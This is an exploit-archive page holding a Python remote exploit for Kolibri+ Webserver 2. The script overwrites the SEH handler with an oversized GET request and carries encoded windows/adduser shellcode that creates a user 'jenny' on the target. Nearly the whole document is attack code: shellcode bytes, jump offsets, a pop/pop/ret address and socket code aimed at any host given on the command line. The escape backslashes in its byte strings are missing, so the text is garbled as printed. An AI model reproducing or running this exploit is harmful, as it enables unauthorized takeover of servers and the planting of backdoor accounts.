Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit
# Published : 2009-09-11
# Author : Blake
# Previous Title : Xerver HTTP Server 4.32 Arbitrary Source Code Disclosure Vuln
# Next Title : Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2

#!/usr/bin/python
#
# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret
# to work correctly despite the large number of usable addresses that were tested.
#
# $ ./kolibri.py 192.168.1.146 8080
#
# [*] Kolibri+ Webserver 2 SEH Overwrite
# [*] Written by blake
# [*] Tested on Windows XP SP 1
# [*] Denial of Service found by Usman Saeed
#
# [+] Connecting to 192.168.1.146 on port 8080
# [+] Sending payload
# [+] Done. User jenny created with the password of pass on 192.168.1.146

import socket, sys

print "n[*] Kolibri+ Webserver 2 SEH Overwrite"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP 1"
print "[*] Denial of Service found by Usman Saeedn"

if len(sys.argv)!= 3:
	print "[*] Usage: %s <ip> <port>"
	sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])

# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass

shellcode = (
"x89xe6xdbxc8xd9x76xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx4bx58x47x34x45x50x43x30x43x30x4cx4bx50"
"x45x47x4cx4cx4bx43x4cx43x35x42x58x43x31x4ax4f"
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4a"
"x4bx50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31"
"x49x50x4cx59x4ex4cx4bx34x49x50x44x34x45x57x49"
"x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47x4b"
"x51x44x51x34x45x54x43x45x4ax45x4cx4bx51x4fx46"
"x44x45x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45"
"x51x4ax4bx4bx39x51x4cx47x54x45x54x49x53x51x4f"
"x50x31x4ax56x43x50x50x56x45x34x4cx4bx50x46x50"
"x30x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4ex4d"
"x4cx4bx43x58x45x58x4dx59x4ax58x4cx43x49x50x42"
"x4ax50x50x45x38x4cx30x4cx4ax44x44x51x4fx43x58"
"x4ax38x4bx4ex4cx4ax44x4ex46x37x4bx4fx4ax47x42"
"x43x42x4dx43x54x46x4ex43x55x43x48x43x55x51x30"
"x46x4fx42x43x51x30x42x4ex42x45x44x34x47x50x44"
"x35x42x53x45x35x43x42x51x30x43x5ax43x55x42x4e"
"x42x4ex43x49x47x50x42x50x43x51x43x43x43x43x51"
"x30x46x4fx51x51x51x54x51x54x51x30x51x36x47x56"
"x47x50x42x4ex45x35x44x34x47x50x42x4cx42x4fx43"
"x53x43x51x42x4cx43x57x42x52x42x4fx42x55x44x30"
"x51x30x51x51x45x34x42x4dx42x49x42x4ex45x39x44"
"x33x44x34x43x42x43x51x44x34x42x4fx42x52x43x43"
"x47x50x43x5ax45x35x42x4ex42x4ex43x49x51x30x46"
"x4fx47x31x51x54x47x34x43x30x41x41")

payload = "x41" * 8			# junk buffer
payload += "x90" * 10			# nop sled
sc = shellcode				# 446 bytes of shellcode
jump_near = "xe9x34xfexffxff"	# jump near -460 bytes
next_seh = "xebxf9xffxff"		# short jump back -7 bytes
seh = "x6fx2axe6x77"		# p/p/r from kernel32.dll
junk = "x41" * 424			# junk buffer

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	s.connect((host,port))
	print "[+] Sending payload"
	s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0rnrn")
	s.close()
	print "[+] Done. User jenny created with the password of pass on %sn" % host
except:
	print "[x] Could not connect!"

# www.Syue.com [2009-09-11]